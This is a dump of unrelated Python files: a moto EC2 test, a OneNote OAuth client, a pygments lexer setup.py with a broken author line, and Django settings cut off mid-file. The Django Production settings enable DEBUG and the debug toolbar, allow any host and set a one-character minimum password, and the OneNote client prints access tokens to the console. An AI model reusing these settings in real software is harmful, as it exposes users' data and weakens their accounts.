""ebsOptimized"",\n ""sriovNetSupport"",\n ]\n\n for valid_instance_attribute in valid_instance_attributes:\n response = client.describe_instance_attribute(\n InstanceId=instance_id, Attribute=valid_instance_attribute\n )\n if valid_instance_attribute == ""groupSet"":\n response.should.have.key(""Groups"")\n response[""Groups""].should.have.length_of(1)\n response[""Groups""][0][""GroupId""].should.equal(security_group_id)\n elif valid_instance_attribute == ""userData"":\n response.should.have.key(""UserData"")\n response[""UserData""].should.be.empty\n\n invalid_instance_attributes = [\n ""abc"",\n ""Kernel"",\n ""RamDisk"",\n ""userdata"",\n ""iNsTaNcEtYpE"",\n ]\n\n for invalid_instance_attribute in invalid_instance_attributes:\n with pytest.raises(ClientError) as ex:\n client.describe_instance_attribute(\n InstanceId=instance_id, Attribute=invalid_instance_attribute\n )\n ex.value.response[""Error""][""Code""].should.equal(""InvalidParameterValue"")\n ex.value.response[""ResponseMetadata""][""HTTPStatusCode""].should.equal(400)\n message = ""Value ({invalid_instance_attribute}) for parameter attribute is invalid. Unknown attribute."".format(\n invalid_instance_attribute=invalid_instance_attribute\n )\n ex.value.response[""Error""][""Message""].should.equal(message)\n\n\n@mock_ec2\ndef test_warn_on_invalid_ami():\n if settings.TEST_SERVER_MODE:\n raise SkipTest(""Can\'t capture warnings in server mode."")\n ec2 = boto3.resource(""ec2"", ""us-east-1"")\n with pytest.warns(\n PendingDeprecationWarning,\n match=r""Could not find AMI with image-id:invalid-ami.+"",\n ):\n ec2.create_instances(ImageId=""invalid-ami"", MinCount=1, MaxCount=1)\n', '""""""\r\nPyOneNote.py\r\n~~~~~~~~~~~~~~~~~\r\n\r\nThis module contains a basic OAuth 2 Authentication and basic handler for GET and POST operations.\r\nThis work was just a quick hack to migrate notes from and old database to onenote but should hep you to understand\r\nthe request structure of OneNote.\r\n\r\nCopyright (c) 2016 Coffeemug13. All rights reserved. Licensed under the MIT license.\r\nSee LICENSE in the project root for license information.\r\n""""""\r\n\r\nimport requests\r\n\r\n\r\nclass OAuth():\r\n """"""Handles the authentication for all requests""""""\r\n\r\n def __init__(self, client_id, client_secret, code=None, token=None, refresh_token=None):\r\n """""" This information is obtained upon registration of a new Outlook Application\r\n The values are just for information and not valid\r\n :param client_id: ""cda3ffaa-2345-a122-3454-adadc556e7bf""\r\n :param client_secret: ""AABfsafd6Q5d1VZmJQNsdac""\r\n :param code: = ""PI:KEY""\r\n :param token: = ""EAFSDTBRB$/UGCCXc8wU/zFu9QnLdZXy+YnElFkAAW......""\r\n :param rtoken: = ""MCKKgf55PCiM2aACbIYads*sdsa%*PWYNj436348v......"" """"""\r\n self.client_id = client_id\r\n self.client_secret = client_secret\r\n self.code = code\r\n self.token = token\r\n self.rtoken = refresh_token\r\n self.redirect_uri = \'https://localhost\'\r\n self.session = requests.Session()\r\n\r\n @staticmethod\r\n def get_authorize_url(client_id):\r\n ""open this url in a browser to let the user grant access to onenote. Extract from the return URL your access code""\r\n url = ""https://login.live.com/oauth20_authorize.srf?client_id={0}&scope=wl.signin%20wl.offline_access%20wl.basic%20office.onenote_create&response_type=code&redirect_uri=https://localhost"".format(\r\n client_id)\r\n return url\r\n\r\n def get_token(self):\r\n """"""\r\n Make the following request with e.g. postman:\r\n POST https://login.live.com/oauth20_token.srf\r\n Content-Type:application/x-www-form-urlencoded\r\n\r\n grant_type:authorization_code\r\n client_id:cda3ffaa-2345-a122-3454-adadc556e7bf\r\n client_secret:AABfsafd6Q5d1VZmJQNsdac\r\n code:111111111-1111-1111-1111-111111111111\r\n redirect_uri:https://localhost\r\n \r\n OneNote will return as result:\r\n {\r\n ""token_type"": ""bearer"",\r\n ""expires_in"": 3600,\r\n ""scope"": ""wl.signin wl.offline_access wl.basic office.onenote_create office.onenote"",\r\n ""access_token"": ""AxxdWR1DBAAUGCCXc8wU/...."",\r\n ""refresh_token"": ""DR3DDEQJPCiM2aACbIYa...."",\r\n ""user_id"": ""AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA""\r\n }\r\n """"""\r\n raise NotImplementedError("""")\r\n\r\n def refresh_token(self):\r\n """"""\r\n Make the following reqest to refresh you token with e.g. postman:\r\n POST https://login.live.com/oauth20_token.srf\r\n Content-Type:application/x-www-form-urlencoded\r\n\r\n grant_type:refresh_token\r\n client_id:cda3ffaa-2345-a122-3454-adadc556e7bf\r\n client_secret:AABfsafd6Q5d1VZmJQNsdac\r\n refresh_token:DR3DDEQJPCiM2aACbIYa....\r\n redirect_uri:https://localhost\r\n -->\r\n {\r\n ""token_type"": ""bearer"",\r\n ""expires_in"": 3600,\r\n ""scope"": ""wl.signin wl.offline_access wl.basic office.onenote_create office.onenote"",\r\n ""access_token"": ""EAFSDTBRB$/UGCCXc8wU/zFu9QnLdZXy+YnElFkAAW..."",\r\n ""refresh_token"": ""DSFDSGSGFABDBGFGBFGF5435kFGDd2J6Bco2Pv2ss..."",\r\n ""user_id"": ""AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA""\r\n }\r\n """"""\r\n url = \'https://login.live.com/oauth20_token.srf\'\r\n headers = {""Content-Type"": ""application/x-www-form-urlencoded""}\r\n data = {""grant_type"": ""refresh_token"",\r\n ""client_id"": self.client_id,\r\n ""client_secret"": self.client_secret,\r\n ""refresh_token"": self.rtoken,\r\n ""redirect_uri"": self.redirect_uri}\r\n\r\n result = self.session.post(url, headers=headers, data=data)\r\n\r\n print(""Refreshed token: "" + result.text)\r\n refresh = result.json()\r\n self.expire = refresh.get(\'expires_in\')\r\n self.token = refresh.get(\'access_token\')\r\n self.rtoken = refresh.get(\'refresh_token\')\r\n print(""Token: "" + self.token)\r\n print(""Refresh Token: "" + self.rtoken)\r\n return True\r\n\r\n def _get(self, url, query):\r\n """"""Handles GET Request with Authentication""""""\r\n headers = {\'user-agent\': \'my-app/0.0.1\', \'Authorization\': \'Bearer \' + self.token}\r\n result = self.session.get(url, headers=headers, params=query)\r\n print(""GET "" + result.url)\r\n print(result.headers)\r\n if (result.text):\r\n print(result.text)\r\n return result\r\n\r\n def _post(self, url: str, headers: list, data: str = None, files: list = None):\r\n """"""Handles POST Request with Authentication""""""\r\n newHeaders = {\'user-agent\': \'my-app/0.0.1\', \'Authorization\': \'Bearer \' + self.token}\r\n if data:\r\n newHeaders.update(headers)\r\n result = self.session.post(url, headers=newHeaders, data=data)\r\n else:\r\n result = self.session.post(url, headers=newHeaders, files=files)\r\n # result.request.headers\r\n print(""POST "" + result.url)\r\n print(result.headers)\r\n if (result.text):\r\n print(result.text)\r\n return result\r\n\r\n def post(self, url: str, headers: list, data: str = None, files: list = None):\r\n """"""post something and handle token expire transparent to the caller""""""\r\n try:\r\n result = self._post(url, headers, data=data, files=files)\r\n if (result.status_code not in (200, 201)):\r\n print(""Error: "" + str(result.status_code))\r\n if (result.status_code == 401):\r\n print(""Refreshing token"")\r\n if self.refresh_token():\r\n result = self._post(url, headers, data, files=files)\r\n else:\r\n print(\'Failed retry refreshing token\')\r\n return result\r\n except Exception as e:\r\n print(e)\r\n pass\r\n\r\n def get(self, url, query, headers=None):\r\n """"""get something and handle token expire transparent to the caller""""""\r\n try:\r\n result = self._get(url, query)\r\n if (result.status_code != requests.codes.ok):\r\n print(""Error: "" + str(result.status_code))\r\n if (result.status_code == 401):\r\n print(""Refreshing token"")\r\n if self.refresh_token():\r\n result = self._get(url, query)\r\n else:\r\n print(\'Failed retry refreshing token\')\r\n return result\r\n except Exception as e:\r\n print(e)\r\n pass\r\n\r\n def get_credentials(self):\r\n """"""Return the actual credentials of this OAuth Instance\r\n :return client_id:""""""\r\n return self.client_id, self.client_secret, self.code, self.token, self.rtoken\r\n\r\n\r\nclass OneNote(OAuth):\r\n """"""This class wraps some OneNote specific calls""""""\r\n def __init__(self, client_id, client_secret, code, token, rtoken):\r\n super().__init__(client_id, client_secret, code, token, rtoken)\r\n self.base = ""https://www.onenote.com/api/v1.0/me/""\r\n\r\n def list_notebooks(self):\r\n url = self.base + ""notes/notebooks""\r\n query = {\'top\': \'5\'}\r\n result = self.get(url, query)\r\n n = None\r\n if (result):\r\n notebooks = result.json()\r\n # result_serialized = json.dumps(result.text)\r\n # notebook = json.loads(result_serialized)\r\n n = notebooks[""value""][0]\r\n x = 1\r\n return n\r\n\r\n def post_page(self, section_id: str, created, title: str, content: str, files: list = None):\r\n """"""post a page. If you want to provide additional images to the page provide them as file list\r\n in the same way like posting multipart message in \'requests\'\r\n .:param content: valid html text with Umlaute converted to ä""""""\r\n url = self.base + ""notes/sections/"" + section_id + ""/pages""\r\n headers = {""Content-Type"": ""application/xhtml+xml""}\r\n # the basic layout of a page is always same\r\n data = """"""\r\n\r\n \r\n {0}\r\n \r\n \r\n \r\n
    \r\n {2}\r\n
    \r\n \r\n\r\n"""""".format(title, created, content)\r\n result = None\r\n if files:\r\n ""post as multipart""\r\n newFiles = [(\'Presentation\', (None, data, \'application/xhtml+xml\', {\'Content-Encoding\': \'utf8\'}))]\r\n newFiles.extend(files)\r\n result = self.post(url, {}, None, files=newFiles)\r\n else:\r\n ""post as simple request""\r\n result = self.post(url, headers, data)\r\n n = None\r\n if (result):\r\n notebooks = result.json()\r\n # result_serialized = json.dumps(result.text)\r\n # notebook = json.loads(result_serialized)\r\n # n = notebooks[""value""][0]\r\n x = 1\r\n return notebooks\r\n', '""""""pygments-sisal module setup script for distribution.""""""\n\nfrom __future__ import with_statement\n\nimport os\nimport setuptools\n\n\ndef get_version(filename):\n with open(filename) as fh:\n for line in fh:\n if line.startswith(\'__version__\'):\n return line.split(\'=\')[-1].strip()[1:-1]\n\n\nsetuptools.setup(\n name=\'pygments-sisal\',\n version=get_version(os.path.join(\'pygments_sisal\', \'__init__.py\')),\n author=\'Alexander Asp Bock\',\n dummy@email.com\',\n platforms=\'All\',\n description=(\'A pygments lexer for SISAL\'),\n install_requires=[\'Pygments>=2.0\'],\n license=\'MIT\',\n keywords=\'pygments, lexer, sisal\',\n url=\'https://github.com/MisanthropicBit/pygments-sisal\',\n packages=setuptools.find_packages(),\n long_description=open(\'README.md\').read(),\n classifiers=[\n \'Development Status :: 5 - Production/Stable\',\n \'Intended Audience :: Developers\',\n \'Topic :: Utilities\',\n \'License :: OSI Approved :: MIT License\',\n \'Programming Language :: Python :: 2.6\',\n \'Programming Language :: Python :: 2.7\',\n \'Programming Language :: Python :: 3\',\n \'Programming Language :: Python :: 3.2\',\n \'Programming Language :: Python :: 3.3\',\n \'Programming Language :: Python :: 3.4\',\n \'Programming Language :: Python :: 3.5\'\n ],\n # Pygments entry point\n entry_points=""[pygments.lexers]\\n""\n ""sisal=pygments_sisal:SisalLexer""\n)\n', '# -*- coding: utf-8 -*-\n""""""\nDjango settings for saefacto project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/dev/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/dev/ref/settings/\n""""""\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nfrom os.path import join\n\n# See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings\ntry:\n from S3 import CallingFormat\n AWS_CALLING_FORMAT = CallingFormat.SUBDOMAIN\nexcept ImportError:\n # TODO: Fix this where even if in Dev this class is called.\n pass\n\nfrom configurations import Configuration, values\n\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n\nclass Common(Configuration):\n\n ########## APP CONFIGURATION\n DJANGO_APPS = (\n # Default Django apps:\n \'django.contrib.auth\',\n \'django.contrib.contenttypes\',\n \'django.contrib.sessions\',\n \'django.contrib.sites\',\n \'django.contrib.messages\',\n \'django.contrib.staticfiles\',\n\n # Useful template tags:\n # \'django.contrib.humanize\',\n # \'suit\',\n # Admin\n \'django.contrib.admin\',\n \'django.contrib.admindocs\',\n )\n THIRD_PARTY_APPS = (\n \'south\', # Database migration helpers:\n \'crispy_forms\', # Form layouts\n \'avatar\', # for user avatars\n \'sitetree\',\n \'sitetree_smartadmin\',\n \'django_user_agents\',\n \'statici18n\', # javascript\n \'parsley\',\n\n )\n\n # Apps specific for this project go here.\n LOCAL_APPS = (\n \'users\', # custom users app\n \'core\',\n \'main\',\n )\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps\n INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS\n\n INSTALLED_APPS += (\n # Needs to come last for now because of a weird edge case between\n # South and allauth\n \'allauth\', # registration\n \'allauth.account\', # registration\n \'allauth.socialaccount\', # registration\n )\n ########## END APP CONFIGURATION\n\n ########## MIDDLEWARE CONFIGURATION\n MIDDLEWARE_CLASSES = (\n \'django.contrib.sessions.middleware.SessionMiddleware\',\n \'django.middleware.common.CommonMiddleware\',\n \'django.middleware.csrf.CsrfViewMiddleware\',\n \'django.contrib.auth.middleware.AuthenticationMiddleware\',\n \'django.contrib.messages.middleware.MessageMiddleware\',\n \'django.middleware.clickjacking.XFrameOptionsMiddleware\',\n \'django_user_agents.middleware.UserAgentMiddleware\',\n )\n ########## END MIDDLEWARE CONFIGURATION\n\n ########## DEBUG\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#debug\n DEBUG = values.BooleanValue(False)\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug\n TEMPLATE_DEBUG = DEBUG\n ########## END DEBUG\n\n ########## SECRET CONFIGURATION\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key\n # Note: This key only used for development and testing.\n # In production, this is changed to a values.SecretValue() setting\n SECRET_KEY = ""CHANGEME!!!""\n ########## END SECRET CONFIGURATION\n\n ########## FIXTURE CONFIGURATION\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS\n FIXTURE_DIRS = (\n join(BASE_DIR, \'fixtures\'),\n )\n ########## END FIXTURE CONFIGURATION\n\n ########## EMAIL CONFIGURATION\n EMAIL_BACKEND = values.Value(\'django.core.mail.backends.smtp.EmailBackend\')\n ########## END EMAIL CONFIGURATION\n\n ########## MANAGER CONFIGURATION\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#admins\n ADMINS = (\n (\'Fábio C. Barrionuevo da Luz\', dummy@email.com\'),\n )\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#managers\n MANAGERS = ADMINS\n ########## END MANAGER CONFIGURATION\n\n ########## DATABASE CONFIGURATION\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#databases\n DATABASES = values.DatabaseURLValue(\'postgres://localhost/saefacto\')\n ########## END DATABASE CONFIGURATION\n\n ########## CACHING\n # Do this here because thanks to django-pylibmc-sasl and pylibmc memcacheify is painful to install on windows.\n # memcacheify is what\'s used in Production\n CACHES = {\n \'default\': {\n \'BACKEND\': \'django.core.cache.backends.locmem.LocMemCache\',\n \'LOCATION\': \'\'\n }\n }\n ########## END CACHING\n\n ########## GENERAL CONFIGURATION\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#time-zone\n TIME_ZONE = \'America/Araguaina\'\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code\n LANGUAGE_CODE = \'pt-br\'\n LANGUAGES = (\n (\'pt-br\', u\'Português do Brasil\'),\n (\'en\', \'English\'),\n (\'es\', u\'Español\'),\n )\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id\n SITE_ID = 1\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n\n USE_I18N = True\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n\n USE_L10N = True\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz\n USE_TZ = True\n ########## END GENERAL CONFIGURATION\n\n ########## TEMPLATE CONFIGURATION\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors\n TEMPLATE_CONTEXT_PROCESSORS = (\n \'django.contrib.auth.context_processors.auth\',\n ""allauth.account.context_processors.account"",\n ""allauth.socialaccount.context_processors.socialaccount"",\n \'django.core.context_processors.debug\',\n \'django.core.context_processors.i18n\',\n \'django.core.context_processors.media\',\n \'django.core.context_processors.static\',\n \'django.core.context_processors.tz\',\n \'django.contrib.messages.context_processors.messages\',\n \'django.core.context_processors.request\',\n # Your stuff: custom template context processers go here\n )\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs\n TEMPLATE_DIRS = (\n join(BASE_DIR, \'templates\'),\n )\n\n TEMPLATE_LOADERS = (\n \'django.template.loaders.filesystem.Loader\',\n \'django.template.loaders.app_directories.Loader\',\n )\n\n # See: http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs\n CRISPY_TEMPLATE_PACK = \'bootstrap3\'\n ########## END TEMPLATE CONFIGURATION\n\n ########## STATIC FILE CONFIGURATION\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root\n STATIC_ROOT = join(os.path.dirname(BASE_DIR), \'staticfiles\')\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url\n STATIC_URL = \'/static/\'\n\n # See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS\n STATICFILES_DIRS = (\n join(BASE_DIR, \'static\'),\n )\n\n # See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders\n STATICFILES_FINDERS = (\n \'django.contrib.staticfiles.finders.FileSystemFinder\',\n \'django.contrib.staticfiles.finders.AppDirectoriesFinder\',\n )\n ########## END STATIC FILE CONFIGURATION\n\n ########## MEDIA CONFIGURATION\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root\n MEDIA_ROOT = join(BASE_DIR, \'media\')\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url\n MEDIA_URL = \'/media/\'\n ########## END MEDIA CONFIGURATION\n\n ########## URL Configuration\n ROOT_URLCONF = \'config.urls\'\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application\n WSGI_APPLICATION = \'config.wsgi.application\'\n ########## End URL Configuration\n\n ########## AUTHENTICATION CONFIGURATION\n AUTHENTICATION_BACKENDS = (\n ""django.contrib.auth.backends.ModelBackend"",\n ""allauth.account.auth_backends.AuthenticationBackend"",\n )\n\n # Some really nice defaults\n ACCOUNT_AUTHENTICATION_METHOD = ""username""\n ACCOUNT_EMAIL_REQUIRED = True\n ACCOUNT_EMAIL_VERIFICATION = ""mandatory""\n ACCOUNT_PASSWORD_MIN_LENGTH = 1\n ########## END AUTHENTICATION CONFIGURATION\n\n ########## Custom user app defaults\n # Select the correct user model\n AUTH_USER_MODEL = ""users.User""\n LOGIN_REDIRECT_URL = ""users:redirect""\n ########## END Custom user app defaults\n\n ########## SLUGLIFIER\n AUTOSLUG_SLUGIFY_FUNCTION = ""slugify.slugify""\n ########## END SLUGLIFIER\n\n ########## LOGGING CONFIGURATION\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#logging\n # A sample logging configuration. The only tangible logging\n # performed by this configuration is to send an email to\n # the site admins on every HTTP 500 error when DEBUG=False.\n # See http://docs.djangoproject.com/en/dev/topics/logging for\n # more details on how to customize your logging configuration.\n LOGGING = {\n \'version\': 1,\n \'disable_existing_loggers\': False,\n \'filters\': {\n \'require_debug_false\': {\n \'()\': \'django.utils.log.RequireDebugFalse\'\n }\n },\n \'handlers\': {\n \'mail_admins\': {\n \'level\': \'ERROR\',\n \'filters\': [\'require_debug_false\'],\n \'class\': \'django.utils.log.AdminEmailHandler\'\n }\n },\n \'loggers\': {\n \'django.request\': {\n \'handlers\': [\'mail_admins\'],\n \'level\': \'ERROR\',\n \'propagate\': True,\n },\n }\n }\n ########## END LOGGING CONFIGURATION\n\n\n ########## Your common stuff: Below this line define 3rd party libary settings\n\n\nclass Local(Common):\n\n ########## DEBUG\n DEBUG = values.BooleanValue(True)\n TEMPLATE_DEBUG = DEBUG\n ########## END DEBUG\n\n ########## INSTALLED_APPS\n INSTALLED_APPS = Common.INSTALLED_APPS\n ########## END INSTALLED_APPS\n\n ########## Mail settings\n EMAIL_HOST = ""localhost""\n EMAIL_PORT = 1025\n EMAIL_BACKEND = values.Value(\'django.core.mail.backends.console.EmailBackend\')\n ########## End mail settings\n ########## DATABASE CONFIGURATION\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#databases\n #DATABASES = values.DatabaseURLValue(\'postgres://localhost/projetosgt\')\n DATABASES = values.DatabaseURLValue(\'sqlite:////{0}.sqlite\'.format(join(BASE_DIR, \'sae_db\')))\n ########## END DATABASE CONFIGURATION\n\n ########## django-debug-toolbar\n MIDDLEWARE_CLASSES = Common.MIDDLEWARE_CLASSES + (\'debug_toolbar.middleware.DebugToolbarMiddleware\',)\n INSTALLED_APPS += (\'debug_toolbar\',)\n\n INTERNAL_IPS = (\'127.0.0.1\',)\n\n DEBUG_TOOLBAR_CONFIG = {\n \'INTERCEPT_REDIRECTS\': False,\n \'SHOW_TEMPLATE_CONTEXT\': True,\n }\n ########## end django-debug-toolbar\n\n ########## Your local stuff: Below this line define 3rd party libary settings\n #SITETREE_MODEL_TREE = \'sitetree_smartadmin.SmartTree\'\n SITETREE_MODEL_TREE_ITEM = \'sitetree_smartadmin.SmartTreeItem\'\n\nclass Production(Common):\n\n ########## INSTALLED_APPS\n INSTALLED_APPS = Common.INSTALLED_APPS\n INSTALLED_APPS += (\'allauth.socialaccount.providers.facebook\',\n \'allauth.socialaccount.providers.github\', )\n ########## END INSTALLED_APPS\n\n ########## SECRET KEY\n SECRET_KEY = values.SecretValue()\n ########## END SECRET KEY\n\n ########## django-secure\n INSTALLED_APPS += (""djangosecure"", )\n\n # set this to 60 seconds and then to 518400 when you can prove it works\n SECURE_HSTS_SECONDS = 60\n SECURE_HSTS_INCLUDE_SUBDOMAINS = values.BooleanValue(True)\n SECURE_FRAME_DENY = values.BooleanValue(True)\n SECURE_CONTENT_TYPE_NOSNIFF = values.BooleanValue(True)\n SECURE_BROWSER_XSS_FILTER = values.BooleanValue(True)\n SESSION_COOKIE_SECURE = values.BooleanValue(False)\n SESSION_COOKIE_HTTPONLY = values.BooleanValue(True)\n SECURE_SSL_REDIRECT = values.BooleanValue(True)\n ########## end django-secure\n\n ########## SITE CONFIGURATION\n # Hosts/domain names that are valid for this site\n # See https://docs.djangoproject.com/en/1.6/ref/settings/#allowed-hosts\n ALLOWED_HOSTS = [""*""]\n ########## END SITE CONFIGURATION\n\n INSTALLED_APPS += (""gunicorn"", )\n\n ########## STORAGE CONFIGURATION\n # See: http://django-storages.readthedocs.org/en/latest/index.html\n INSTALLED_APPS += (\n \'storages\',\n )\n\n # See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings\n STATICFILES_STORAGE = DEFAULT_FILE_STORAGE = \'storages.backends.s3boto.S3BotoStorage\'\n\n # See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings\n AWS_ACCESS_KEY_ID = values.SecretValue()\n AWS_SECRET_ACCESS_KEY = values.SecretValue()\n AWS_STORAGE_BUCKET_NAME = values.SecretValue()\n AWS_AUTO_CREATE_BUCKET = True\n AWS_QUERYSTRING_AUTH = False\n\n # see: https://github.com/antonagestam/collectfast\n AWS_PRELOAD_METADATA = True\n INSTALLED_APPS += (""collectfast"", )\n\n # AWS cache settings, don\'t change unless you know what you\'re doing:\n AWS_EXPIREY = 60 * 60 * 24 * 7\n AWS_HEADERS = {\n \'Cache-Control\': \'max-age=%d, s-maxage=%d, must-revalidate\' % (AWS_EXPIREY,\n AWS_EXPIREY)\n }\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url\n STATIC_URL = \'https://s3.amazonaws.com/%s/\' % AWS_STORAGE_BUCKET_NAME\n ########## END STORAGE CONFIGURATION\n\n ########## EMAIL\n DEFAULT_FROM_EMAIL = values.Value(\n \'saefacto dummy@email.com\')\n EMAIL_HOST = values.Value(\'smtp.sendgrid.com\')\n EMAIL_HOST_PASSWORD = values.SecretValue(environ_prefix="""", environ_name=""SENDGRID_PASSWORD"")\n EMAIL_HOST_USER = values.SecretValue(environ_prefix="""", environ_name=""SENDGRID_USERNAME"")\n EMAIL_PORT = values.IntegerValue(587, environ_prefix="""", environ_name=""EMAIL_PORT"")\n EMAIL_SUBJECT_PREFIX = values.Value(\'[saefacto] \', environ_name=""EMAIL_SUBJECT_PREFIX"")\n EMAIL_USE_TLS = True\n SERVER_EMAIL = EMAIL_HOST_USER\n ########## END EMAIL\n\n ########## TEMPLATE CONFIGURATION\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs\n TEMPLATE_LOADERS = (\n (\'django.template.loaders.cached.Loader\', (\n \'django.template.loaders.filesystem.Loader\',\n \'django.template.loaders.app_directories.Loader\',\n )),\n )\n ########## END TEMPLATE CONFIGURATION\n\n ########## CACHING\n # Only do this here because thanks to django-pylibmc-sasl and pylibmc memcacheify is painful to install on windows.\n try:\n # See: https://github.com/rdegges/django-heroku-memcacheify\n from memcacheify import memcacheify\n CACHES = memcacheify()\n except ImportError:\n CACHES = values.CacheURLValue(default=""memcached://127.0.0.1:11211"")\n ########## END CACHING\n\n ########## Your production stuff: Below this line define 3rd party libary settings\n\n ########## DEBUG\n DEBUG = values.BooleanValue(True)\n TEMPLATE_DEBUG = DEBUG\n ########## END DEBUG\n ########## django-debug-toolbar\n MIDDLEWARE_CLASSES = Common.MIDDLEWARE_CLASSES + (\'debug_toolbar.middleware.DebugToolbarMiddleware\',)\n INSTALLED_APPS += (\'debug_toolbar\',)\n\n INTERNAL_IPS = (\'127.0.0.1\',)\n\n DEBUG_TOOLBAR_CONFIG = {\n \'DISABLE_PANELS\': [\'debug_toolbar.panels.redirects.RedirectsPanel\'],\n \'SHOW_TEMPLATE_CONTEXT\': True,\n }\n ########## end django-debug-toolbar\n\n\n#######################################################################################\n# hack terrivelmente feio para fazer o Pycharm identificar as bibliotecas\n# o codigo abaixo nunca sera executado\nif 1 == 2:\n INSTALLED_APPS = (\n # Default Django apps:\n \'django.contrib.auth\',\n \'django.contrib.contenttypes\',\n \'django.contrib.sessions\',\n \'django.contrib.sites\',\n \'django.contrib.messages\',\n \'django.contrib.staticfiles\',\n\n # Useful template tags:\n # \'django.contrib.humanize\',\n\n # Admin\n \'django.contrib.admin\',\n\n \'south\', # Database migration helpers:\n \'crispy_forms\', # Form layouts\n \'avatar\', # for user avatars\n \'sitetree\',\n \'sitetree_smartadmin\',\n \'django_user_agents\',\n \'statici18n\', # javascript\n\n \'users\', # custom users app\n \'core\',\n \'main\',\n\n # Needs to come last for now because of a weird edge case between\n # South and allauth\n \'allauth\', # registration\n \'allauth.account\', # registration\n \'allauth.socialaccount\', # registration\n )\n ########## END APP CONFIGURATION\n\n ########## MIDDLEWARE CONFIGURATION\n MIDDLEWARE_CLASSES = (\n \'django.contrib.sessions.middleware.SessionMiddleware\',\n \'django.middleware.common.CommonMiddleware\',\n \'django.middleware.csrf.CsrfViewMiddleware\',\n \'django.contrib.auth.middleware.AuthenticationMiddleware\',\n \'django.contrib.messages.middleware.MessageMiddleware\',\n \'django.middleware.clickjacking.XFrameOptionsMiddleware\',\n )\n ########## END MIDDLEWARE CONFIGURATION\n\n ########## DEBUG\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#debug\n DEBUG = True\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug\n TEMPLATE_DEBUG = DEBUG\n ########## END DEBUG\n\n ########## SECRET CONFIGURATION\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key\n # Note: This key only used for development and testing.\n # In production, this is changed to a values.SecretValue() setting\n SECRET_KEY = ""CHANGEME!!!""\n ########## END SECRET CONFIGURATION\n\n ########## FIXTURE CONFIGURATION\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS\n FIXTURE_DIRS = (\n join(BASE_DIR, \'fixtures\'),\n )\n ########## END FIXTURE CONFIGURATION\n\n ########## EMAIL CONFIGURATION\n EMAIL_BACKEND = values.Value(\'django.core.mail.backends.smtp.EmailBackend\')\n ########## END EMAIL CONFIGURATION\n\n ########## MANAGER CONFIGURATION\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#admins\n ADMINS = (\n (\'Fábio C. Barrionuevo da Luz\', dummy@email.com\'),\n )\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#managers\n MANAGERS = ADMINS\n ########## END MANAGER CONFIGURATION\n\n ########## DATABASE CONFIGURATION\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#databases\n\n ########## END DATABASE CONFIGURATION\n\n ########## CACHING\n # Do this here because thanks to django-pylibmc-sasl and pylibmc memcacheify is painful to install on windows.\n # memcacheify is what\'s used in Production\n CACHES = {\n \'default\': {\n \'BACKEND\': \'django.core.cache.backends.locmem.LocMemCache\',\n \'LOCATION\': \'\'\n }\n }\n ########## END CACHING\n\n ########## GENERAL CONFIGURATION\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#time-zone\n TIME_ZONE = \'America/Los_Angeles\'\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code\n LANGUAGE_CODE = \'en-us\'\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id\n SITE_ID = 1\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n\n USE_I18N = True\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n\n USE_L10N = True\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz\n USE_TZ = True\n ########## END GENERAL CONFIGURATION\n\n ########## TEMPLATE CONFIGURATION\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors\n TEMPLATE_CONTEXT_PROCESSORS = (\n \'django.contrib.auth.context_processors.auth\',\n ""allauth.account.context_processors.account"",\n 